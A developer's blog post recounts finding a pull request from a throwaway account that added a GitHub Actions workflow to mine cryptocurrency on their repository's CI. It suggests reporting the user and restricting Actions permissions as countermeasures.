While scrolling through my GitHub feed I noticed a recent fork (5 hours ago) of a repo of mine.

Nothing so weird so far.

Out of curiosity I checked if the user wanted to make a decent PR and improve something in the code.

The user in fact made a new commit on their fork and added a new file. A new GitHub action.

Let me explain what happened.

tldr;

Update: the 2 links below are unavailable since I reported the user and GitHub took action

  • this is the pull request
  • in the “Files changed” tab you can clearly see that this is a mining attack abusing GitHub Actions
  • I don’t think this is directly harmful to the end-user, although it’s still shady af

What happened

This new user (account age is a few hours) forked one of my repos.

They opened a shady PR containing the following changes:

malicious-action

They only added a new GitHub Actions workflow, named Rowr.yml that ran a mining script for 5 hours in a 20 job build matrix.

matrix

Here is the joyful script mining away

miner

Another thing I noticed was that they opened and closed the PR three times, to trigger multiple builds

runs

Prevention of such abuse?

Surely reporting the user doesn’t hurt. Although it won’t stop throw-away accounts to pop up and plant malicious code in GitHub actions.

report

Another maybe more effective measure you can take is to change the GitHub actions permissions to “Allow local actions only”.

I think this means that new GitHub actions that are added through a PR, won’t be automatically run, but only if you merge the PR:

actions-permissions

Similar news elsewhere

Doing a quick search I found other people reporting about this issue.

comment